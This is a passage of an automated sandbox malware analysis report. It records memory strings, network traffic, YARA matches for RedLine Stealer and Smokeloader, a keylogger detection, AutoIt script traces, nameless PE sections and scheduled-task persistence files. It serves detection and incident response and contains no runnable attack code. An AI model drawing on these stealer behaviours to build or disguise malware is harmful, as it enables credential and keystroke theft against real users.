Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000023.00000003.2911410230.000002863BF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/J
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgL4
Source: firefox.exe, 00000018.00000002.2623557649.00000096528BB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3350268483.000002863270E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/getActiveAddons/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/toolkit/about/aboutPlugins.ftlhttps://www.openh264.org/operationsRequiringR
Source: firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account7
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account=
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountH
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountI
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORT
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountQ
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account_
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocati
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldVie
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountw
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000023.00000002.3357057608.0000028632C41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297087442.000002862E582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49568
Source: unknown	Network traffic detected: HTTP traffic on port 49567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49554
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49565
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49553
Source: unknown	Network traffic detected: HTTP traffic on port 49563 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49563
Source: unknown	Network traffic detected: HTTP traffic on port 49568 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49562
Source: unknown	Network traffic detected: HTTP traffic on port 49565 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49550
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49561
Source: unknown	Network traffic detected: HTTP traffic on port 49564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49561 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49554 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49553 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49558

Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2

Installs a raw input device (often for capturing keystrokes)

Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES

memstr_ce4959c1-9

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 6824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1c593ec106.exe PID: 3960, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9374cf64-b
Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0f8a039e-2
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_267b08d5-7
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c9dee059-b
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3021083a-f
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7e0d4c10-0

PE file contains section with special chars

Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: 8NjcvPNvUr.exe	Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name:
Source: random[1].exe.8.dr	Static PE information: section name: .idata
Source: random[1].exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: random[1].exe0.8.dr	Static PE information: section name: .idata
Source: random[1].exe0.8.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name:
Source: axplong.exe.18.dr	Static PE information: section name: .idata
Source: axplong.exe.18.dr	Static PE information: section name:

PE file has nameless sections

Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:
Source: 1c593ec106.exe.7.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C22B700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B8C0 rand_s,NtQueryVirtualMemory,	8_2_6C22B8C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	8_2_6C22B910
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_6C1CF280

Creates files inside the system directory

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File created: C:\Windows\Tasks\explorti.job			Jump to behavior
Source: C:\Users\userKFHCAEGCBF.exe	File created: C:\Windows\Tasks\axplong.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00353068	7_2_00353068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00314CF0	7_2_00314CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00347D83	7_2_00347D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0035765B	7_2_0035765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00314AF0	7_2_00314AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00358720	7_2_00358720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00356F09	7_2_00356F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0035777B	7_2_0035777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00352BD0	7_2_00352BD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1C35A0	8_2_6C1C35A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23542B	8_2_6C23542B
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23AC00	8_2_6C23AC00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C205C10	8_2_6C205C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C212C10	8_2_6C212C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D5440	8_2_6C1D5440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C23545C	8_2_6C23545C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2234A0	8_2_6C2234A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C22C4A0	8_2_6C22C4A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D6C80	8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1ED4D0	8_2_6C1ED4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C206CF0	8_2_6C206CF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D64C0	8_2_6C1D64C0
